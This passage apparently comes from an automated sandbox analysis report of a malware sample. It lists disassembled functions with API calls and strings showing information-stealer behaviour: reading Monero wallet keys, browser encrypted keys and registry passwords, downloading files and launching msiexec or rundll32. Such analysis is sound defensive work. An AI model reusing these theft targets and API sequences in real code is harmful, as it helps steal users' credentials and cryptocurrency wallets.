                    • Instruction Fuzzy Hash: AB71FB71910208AFDB04EFE5DC89FEEB7B8BB48300F148559F516B7290EB35A945CB61
                    Function 00BD2E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00BDA740: lstrcpy.KERNEL32(00BE0E17,00000000), ref: 00BDA788
                    • ShellExecuteEx.SHELL32(0000003C), ref: 00BD31C5
                    • ShellExecuteEx.SHELL32(0000003C), ref: 00BD335D
                    • ShellExecuteEx.SHELL32(0000003C), ref: 00BD34EA
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExecuteShell$lstrcpy
                    • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                    • API String ID: 2507796910-3625054190
                    • Opcode ID: 02dae87921176b11ec092149eacb5f7161831e79d2ba828e566d52db19da8e0c
                    • Instruction ID: 6d4219c6d14cd56031eacbe85b26f4af75b7f4768a2ecdc8635a17d744327e46
                    • Opcode Fuzzy Hash: 02dae87921176b11ec092149eacb5f7161831e79d2ba828e566d52db19da8e0c
                    • Instruction Fuzzy Hash: A8120E718101489ADB05FBA0DC92FEDF7B8AF14300F5041AAE50676291FF752B4ACFA6
                    Function 00BD52C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00BDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BDA7E6
                      • Part of subcall function 00BC6280: InternetOpenA.WININET(00BE0DFE,00000001,00000000,00000000,00000000), ref: 00BC62E1
                      • Part of subcall function 00BC6280: StrCmpCA.SHLWAPI(?,013CEA08), ref: 00BC6303
                      • Part of subcall function 00BC6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00BC6335
                      • Part of subcall function 00BC6280: HttpOpenRequestA.WININET(00000000,GET,?,013CDFD8,00000000,00000000,00400100,00000000), ref: 00BC6385
                      • Part of subcall function 00BC6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00BC63BF
                      • Part of subcall function 00BC6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00BC63D1
                      • Part of subcall function 00BDA8A0: lstrcpy.KERNEL32(?,00BE0E17), ref: 00BDA905
                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00BD5318
                    • lstrlen.KERNEL32(00000000), ref: 00BD532F
                      • Part of subcall function 00BD8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00BD8E52
                    • StrStrA.SHLWAPI(00000000,00000000), ref: 00BD5364
                    • lstrlen.KERNEL32(00000000), ref: 00BD5383
                    • lstrlen.KERNEL32(00000000), ref: 00BD53AE
                      • Part of subcall function 00BDA740: lstrcpy.KERNEL32(00BE0E17,00000000), ref: 00BDA788
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                    • API String ID: 3240024479-1526165396
                    • Opcode ID: 5063cc6bc5948469121bd7f11e5f1d9a3a9b0501b35208099c6dcc8ad7b14a36
                    • Instruction ID: a31991900b624a52f424104c36300cebc71fa7037ceac1e958dd106e25276552
                    • Opcode Fuzzy Hash: 5063cc6bc5948469121bd7f11e5f1d9a3a9b0501b35208099c6dcc8ad7b14a36
                    • Instruction Fuzzy Hash: 0D512F309101499BCB14FF64CD96EEDB7B9EF10300F5044A9F80A6A292FF356B46DB66
                    Function 00BD12D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpylstrlen
                    • String ID:
                    • API String ID: 2001356338-0
                    • Opcode ID: d910c84edc357a83f433faf8f37762f0a0e47e3e9b3c1be71c94102fc43bf47a
                    • Instruction ID: d113ce2bc10693421bbe72178e9e95ff7e36d37dca428e027e163e6e5abad83e
                    • Opcode Fuzzy Hash: d910c84edc357a83f433faf8f37762f0a0e47e3e9b3c1be71c94102fc43bf47a
                    • Instruction Fuzzy Hash: A1C1A5B590021DABCB14EF60DC89FEAB3B8BB54304F0445E9E50A67251FA71AA85CF91
                    Function 00BD4280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00BD8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00BD8E0B
                    • lstrcat.KERNEL32(?,00000000), ref: 00BD42EC
                    • lstrcat.KERNEL32(?,013CE500), ref: 00BD430B
                    • lstrcat.KERNEL32(?,?), ref: 00BD431F
                    • lstrcat.KERNEL32(?,013CD470), ref: 00BD4333
                      • Part of subcall function 00BDA740: lstrcpy.KERNEL32(00BE0E17,00000000), ref: 00BDA788
                      • Part of subcall function 00BD8D90: GetFileAttributesA.KERNEL32(00000000,?,00BC1B54,?,?,00BE564C,?,?,00BE0E1F), ref: 00BD8D9F
                      • Part of subcall function 00BC9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00BC9D39
                      • Part of subcall function 00BC99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BC99EC
                      • Part of subcall function 00BC99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00BC9A11
                      • Part of subcall function 00BC99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00BC9A31
                      • Part of subcall function 00BC99C0: ReadFile.KERNEL32(000000FF,?,00000000,00BC148F,00000000), ref: 00BC9A5A
                      • Part of subcall function 00BC99C0: LocalFree.KERNEL32(00BC148F), ref: 00BC9A90
                      • Part of subcall function 00BC99C0: CloseHandle.KERNEL32(000000FF), ref: 00BC9A9A
                      • Part of subcall function 00BD93C0: GlobalAlloc.KERNEL32(00000000,00BD43DD,00BD43DD), ref: 00BD93D3
                    • StrStrA.SHLWAPI(?,013CE4B8), ref: 00BD43F3
                    • GlobalFree.KERNEL32(?), ref: 00BD4512
                      • Part of subcall function 00BC9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00BC4EEE,00000000,00000000), ref: 00BC9AEF
                      • Part of subcall function 00BC9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00BC4EEE,00000000,?), ref: 00BC9B01
                      • Part of subcall function 00BC9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00BC4EEE,00000000,00000000), ref: 00BC9B2A
                      • Part of subcall function 00BC9AC0: LocalFree.KERNEL32(?,?,?,?,00BC4EEE,00000000,?), ref: 00BC9B3F
                    • lstrcat.KERNEL32(?,00000000), ref: 00BD44A3
                    • StrCmpCA.SHLWAPI(?,00BE08D1), ref: 00BD44C0
                    • lstrcat.KERNEL32(00000000,00000000), ref: 00BD44D2
                    • lstrcat.KERNEL32(00000000,?), ref: 00BD44E5
                    • lstrcat.KERNEL32(00000000,00BE0FB8), ref: 00BD44F4
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                    • String ID:
                    • API String ID: 3541710228-0
                    • Opcode ID: 83254cc380fd9e511db36340d27498ec03dcd792993c67bb2ce0d08f179dc9d7
                    • Instruction ID: acc3a9f1aff61dd074b30fe4fec895d4041d714ad7cbd2ccbae623e23720ece4
                    • Opcode Fuzzy Hash: 83254cc380fd9e511db36340d27498ec03dcd792993c67bb2ce0d08f179dc9d7
                    • Instruction Fuzzy Hash: 3C713876910208ABDB14FBA0DC99FEE73B9AB48300F0485D9F505A7181EB75DB49CFA1
                    Function 00BC1310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00BC12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BC12B4
                      • Part of subcall function 00BC12A0: RtlAllocateHeap.NTDLL(00000000), ref: 00BC12BB
                      • Part of subcall function 00BC12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00BC12D7
                      • Part of subcall function 00BC12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00BC12F5
                      • Part of subcall function 00BC12A0: RegCloseKey.ADVAPI32(?), ref: 00BC12FF
                    • lstrcat.KERNEL32(?,00000000), ref: 00BC134F
                    • lstrlen.KERNEL32(?), ref: 00BC135C
                    • lstrcat.KERNEL32(?,.keys), ref: 00BC1377
                      • Part of subcall function 00BDA740: lstrcpy.KERNEL32(00BE0E17,00000000), ref: 00BDA788
                      • Part of subcall function 00BDA9B0: lstrlen.KERNEL32(?,013C9238,?,\Monero\wallet.keys,00BE0E17), ref: 00BDA9C5
                      • Part of subcall function 00BDA9B0: lstrcpy.KERNEL32(00000000), ref: 00BDAA04
                      • Part of subcall function 00BDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BDAA12
                      • Part of subcall function 00BDA8A0: lstrcpy.KERNEL32(?,00BE0E17), ref: 00BDA905
                      • Part of subcall function 00BD8B60: GetSystemTime.KERNEL32(00BE0E1A,013CA5A0,00BE05AE,?,?,00BC13F9,?,0000001A,00BE0E1A,00000000,?,013C9238,?,\Monero\wallet.keys,00BE0E17), ref: 00BD8B86
                      • Part of subcall function 00BDA920: lstrcpy.KERNEL32(00000000,?), ref: 00BDA972
                      • Part of subcall function 00BDA920: lstrcat.KERNEL32(00000000), ref: 00BDA982
                    • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00BC1465
                      • Part of subcall function 00BDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BDA7E6
                      • Part of subcall function 00BC99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BC99EC
                      • Part of subcall function 00BC99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00BC9A11
                      • Part of subcall function 00BC99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00BC9A31
                      • Part of subcall function 00BC99C0: ReadFile.KERNEL32(000000FF,?,00000000,00BC148F,00000000), ref: 00BC9A5A
                      • Part of subcall function 00BC99C0: LocalFree.KERNEL32(00BC148F), ref: 00BC9A90
                      • Part of subcall function 00BC99C0: CloseHandle.KERNEL32(000000FF), ref: 00BC9A9A
                    • DeleteFileA.KERNEL32(00000000), ref: 00BC14EF
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                    • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                    • API String ID: 3478931302-218353709
                    • Opcode ID: e12f80f8317a66523438d02ef66fd9e020f457210bf44b0ab63a93004fcd5ed8
                    • Instruction ID: 225826110e7e750243fe5f36904433aef5918891466f49c789dd3821c77e4c4b
                    • Opcode Fuzzy Hash: e12f80f8317a66523438d02ef66fd9e020f457210bf44b0ab63a93004fcd5ed8
                    • Instruction Fuzzy Hash: 905150B1D101195BCB15EB60DC92FEDB3BCAF50300F4045E9B60A72192FF716B89CAA6
                    Function 00BC75D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00BC72D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00BC733A
                      • Part of subcall function 00BC72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00BC73B1
                      • Part of subcall function 00BC72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00BC740D
                      • Part of subcall function 00BC72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00BC7452
                      • Part of subcall function 00BC72D0: HeapFree.KERNEL32(00000000), ref: 00BC7459
                    • lstrcat.KERNEL32(00000000,00BE17FC), ref: 00BC7606
                    • lstrcat.KERNEL32(00000000,00000000), ref: 00BC7648
                    • lstrcat.KERNEL32(00000000, : ), ref: 00BC765A
                    • lstrcat.KERNEL32(00000000,00000000), ref: 00BC768F
                    • lstrcat.KERNEL32(00000000,00BE1804), ref: 00BC76A0
                    • lstrcat.KERNEL32(00000000,00000000), ref: 00BC76D3
                    • lstrcat.KERNEL32(00000000,00BE1808), ref: 00BC76ED
                    • task.LIBCPMTD ref: 00BC76FB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                    • String ID: :
                    • API String ID: 2677904052-3653984579
                    • Opcode ID: 412661326116d97fda712449a0560979d3742490fe1cd3a5404e6b36c04da4fb
                    • Instruction ID: 694f929a4d5f5f2a5135a66533bbc8e3e4f912063ba900e3723885a0ab777a06
                    • Opcode Fuzzy Hash: 412661326116d97fda712449a0560979d3742490fe1cd3a5404e6b36c04da4fb
                    • Instruction Fuzzy Hash: 3B31E671900209DFCB08EBB5DC99EFE77F9BB54301B184568F102B7251DE35A986CB61
                    Function 00BD8100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,013CE338,00000000,?,00BE0E2C,00000000,?,00000000), ref: 00BD8130
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00BD8137
                    • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00BD8158
                    • __aulldiv.LIBCMT ref: 00BD8172
                    • __aulldiv.LIBCMT ref: 00BD8180
                    • wsprintfA.USER32 ref: 00BD81AC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                    • String ID: %d MB$@
                    • API String ID: 2774356765-3474575989
                    • Opcode ID: 9504d7d6971364cbe8dd742f6a19eeed70556a7074c4b32fe71fd1e77e84b3ed
                    • Instruction ID: 16ade8e790a114cd82b33e0da1ae14af2cf5fbdb46007bee8eae0e8282019b6f
                    • Opcode Fuzzy Hash: 9504d7d6971364cbe8dd742f6a19eeed70556a7074c4b32fe71fd1e77e84b3ed
                    • Instruction Fuzzy Hash: C82158B1E44318ABDB00DFD5CC49FAEB7B8FB48B00F10465AF605BB280D77969058BA5
                    Function 00BC60A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00BDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BDA7E6
                      • Part of subcall function 00BC47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00BC4839
                      • Part of subcall function 00BC47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00BC4849
                    • InternetOpenA.WININET(00BE0DF7,00000001,00000000,00000000,00000000), ref: 00BC610F
                    • StrCmpCA.SHLWAPI(?,013CEA08), ref: 00BC6147
                    • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00BC618F
                    • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00BC61B3
                    • InternetReadFile.WININET(?,?,00000400,?), ref: 00BC61DC
                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00BC620A
                    • CloseHandle.KERNEL32(?,?,00000400), ref: 00BC6249
                    • InternetCloseHandle.WININET(?), ref: 00BC6253
                    • InternetCloseHandle.WININET(00000000), ref: 00BC6260
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                    • String ID:
